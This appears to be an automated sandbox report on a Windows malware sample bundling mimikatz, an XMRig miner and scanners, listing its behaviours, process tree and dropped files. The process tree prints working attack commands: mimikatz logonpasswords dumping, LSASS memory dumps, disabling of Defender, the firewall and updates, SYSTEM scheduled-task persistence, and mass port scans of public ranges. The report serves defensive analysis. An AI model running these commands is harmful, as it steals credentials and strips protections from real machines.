Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2024 05:07

General

  • Target

    2024-10-12_ec74c1f8debbdf829c43c544feb81f2e_hacktools_icedid_mimikatz.exe

  • Size

    9.1MB

  • MD5

    ec74c1f8debbdf829c43c544feb81f2e

  • SHA1

    0114e78b98254f601159571f7757376adb413f7d

  • SHA256

    39487cb781aeee9e07871696c7b5c30051e9a50e2594d5dfedb12a2ad7726c92

  • SHA512

    dfc5f243be5da4af32309a754d13613daa739c14defa71f9a4ab66b8a0e19f57a7ddb8a24e9c075728708f259df09e9d943319d7a67045b48d76ce983cebf41f

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (19856) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 33 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1380
      • C:\Windows\TEMP\genjjusrl\hiukvr.exe
        "C:\Windows\TEMP\genjjusrl\hiukvr.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2036
    • C:\Users\Admin\AppData\Local\Temp\2024-10-12_ec74c1f8debbdf829c43c544feb81f2e_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-10-12_ec74c1f8debbdf829c43c544feb81f2e_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5064
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tpizqeql\fbyqtdq.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4708
        • C:\Windows\tpizqeql\fbyqtdq.exe
          C:\Windows\tpizqeql\fbyqtdq.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3784
    • C:\Windows\tpizqeql\fbyqtdq.exe
      C:\Windows\tpizqeql\fbyqtdq.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2292
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:2412
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3176
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:436
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2016
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3504
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:1224
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:1272
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:764
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\iefblqiiz\bsvlqulnj\wpcap.exe /S
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2220
              • C:\Windows\iefblqiiz\bsvlqulnj\wpcap.exe
                C:\Windows\iefblqiiz\bsvlqulnj\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1768
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:216
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4968
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1948
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3520
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3972
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4148
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4756
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2764
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4996
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4032
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:5064
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1996
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2472
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4748
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\iefblqiiz\bsvlqulnj\ipdqsnhqb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iefblqiiz\bsvlqulnj\Scant.txt
              2⤵
                PID:1676
                • C:\Windows\iefblqiiz\bsvlqulnj\ipdqsnhqb.exe
                  C:\Windows\iefblqiiz\bsvlqulnj\ipdqsnhqb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iefblqiiz\bsvlqulnj\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1460
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\iefblqiiz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\iefblqiiz\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:3988
                • C:\Windows\iefblqiiz\Corporate\vfshost.exe
                  C:\Windows\iefblqiiz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1272
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rtvtziebs" /ru system /tr "cmd /c C:\Windows\ime\fbyqtdq.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1040
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2708
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "rtvtziebs" /ru system /tr "cmd /c C:\Windows\ime\fbyqtdq.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4224
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ipyqluzlq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F"
                2⤵
                  PID:3132
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3136
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "ipyqluzlq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:2724
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lnuuvqibb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2440
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3836
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "lnuuvqibb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1584
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4300
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:1928
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1504
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2300
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4100
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:884
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2768
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2656
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4728
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4336
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:4280
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:464
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3636
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                      PID:3756
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4868
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4032
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4848
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3744
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:32
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3052
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4540
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:964
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1408
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                        PID:2724
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3688
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3492
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:736
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4228
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2156
                      • C:\Windows\SysWOW64\sc.exe
                        sc config MpsSvc start= disabled
                        3⤵
                        • Launches sc.exe
                        PID:2468
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config SharedAccess start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2292
                      • C:\Windows\SysWOW64\sc.exe
                        sc config SharedAccess start= disabled
                        3⤵
                        • Launches sc.exe
                        PID:2500
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config WinDefend start= disabled
                      2⤵
                        PID:212
                        • C:\Windows\SysWOW64\sc.exe
                          sc config WinDefend start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:4720
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config wuauserv start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3016
                        • C:\Windows\SysWOW64\sc.exe
                          sc config wuauserv start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:1516
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 784 C:\Windows\TEMP\iefblqiiz\784.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2980
                      • C:\Windows\TEMP\xohudmc.exe
                        C:\Windows\TEMP\xohudmc.exe
                        2⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:3272
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 316 C:\Windows\TEMP\iefblqiiz\316.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2200
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 1380 C:\Windows\TEMP\iefblqiiz\1380.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2216
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2504 C:\Windows\TEMP\iefblqiiz\2504.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1988
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 2876 C:\Windows\TEMP\iefblqiiz\2876.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2768
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3008 C:\Windows\TEMP\iefblqiiz\3008.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3952
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 408 C:\Windows\TEMP\iefblqiiz\408.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4528
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3732 C:\Windows\TEMP\iefblqiiz\3732.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3516
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3820 C:\Windows\TEMP\iefblqiiz\3820.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1724
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3888 C:\Windows\TEMP\iefblqiiz\3888.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1936
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3964 C:\Windows\TEMP\iefblqiiz\3964.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3136
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 3580 C:\Windows\TEMP\iefblqiiz\3580.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1564
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 4808 C:\Windows\TEMP\iefblqiiz\4808.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3052
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 4544 C:\Windows\TEMP\iefblqiiz\4544.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:452
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 4600 C:\Windows\TEMP\iefblqiiz\4600.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2568
                      • C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe
                        C:\Windows\TEMP\iefblqiiz\ysyinnueq.exe -accepteula -mp 1372 C:\Windows\TEMP\iefblqiiz\1372.dmp
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2436
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c C:\Windows\iefblqiiz\bsvlqulnj\scan.bat
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4456
                        • C:\Windows\iefblqiiz\bsvlqulnj\hjrtlerqg.exe
                          hjrtlerqg.exe TCP 138.199.0.1 138.199.255.255 445 512 /save
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:4980
                    • C:\Windows\SysWOW64\lqvjma.exe
                      C:\Windows\SysWOW64\lqvjma.exe
                      1⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:2008
                    • C:\Windows\system32\cmd.EXE
                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F
                      1⤵
                        PID:4640
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          2⤵
                            PID:1100
                          • C:\Windows\system32\cacls.exe
                            cacls C:\Windows\tpizqeql\fbyqtdq.exe /p everyone:F
                            2⤵
                              PID:952
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\fbyqtdq.exe
                            1⤵
                              PID:4744
                              • C:\Windows\ime\fbyqtdq.exe
                                C:\Windows\ime\fbyqtdq.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:2132
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F
                              1⤵
                                PID:1928
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  2⤵
                                    PID:1412
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\TEMP\genjjusrl\hiukvr.exe /p everyone:F
                                    2⤵
                                      PID:4488

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Windows\SysWOW64\Packet.dll

                                    Filesize

                                    95KB

                                    MD5

                                    86316be34481c1ed5b792169312673fd

                                    SHA1

                                    6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                    SHA256

                                    49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                    SHA512

                                    3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                  • C:\Windows\SysWOW64\wpcap.dll

                                    Filesize

                                    275KB

                                    MD5

                                    4633b298d57014627831ccac89a2c50b

                                    SHA1

                                    e5f449766722c5c25fa02b065d22a854b6a32a5b

                                    SHA256

                                    b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                    SHA512

                                    29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                  • C:\Windows\TEMP\genjjusrl\config.json

                                    Filesize

                                    693B

                                    MD5

                                    f2d396833af4aea7b9afde89593ca56e

                                    SHA1

                                    08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                    SHA256

                                    d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                    SHA512

                                    2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                  • C:\Windows\TEMP\iefblqiiz\1380.dmp

                                    Filesize

                                    4.2MB

                                    MD5

                                    c39f59a5a9c2d39143601f6362e7a467

                                    SHA1

                                    a1987072898f1e20c5b8d955219cb1a0f1d164a7

                                    SHA256

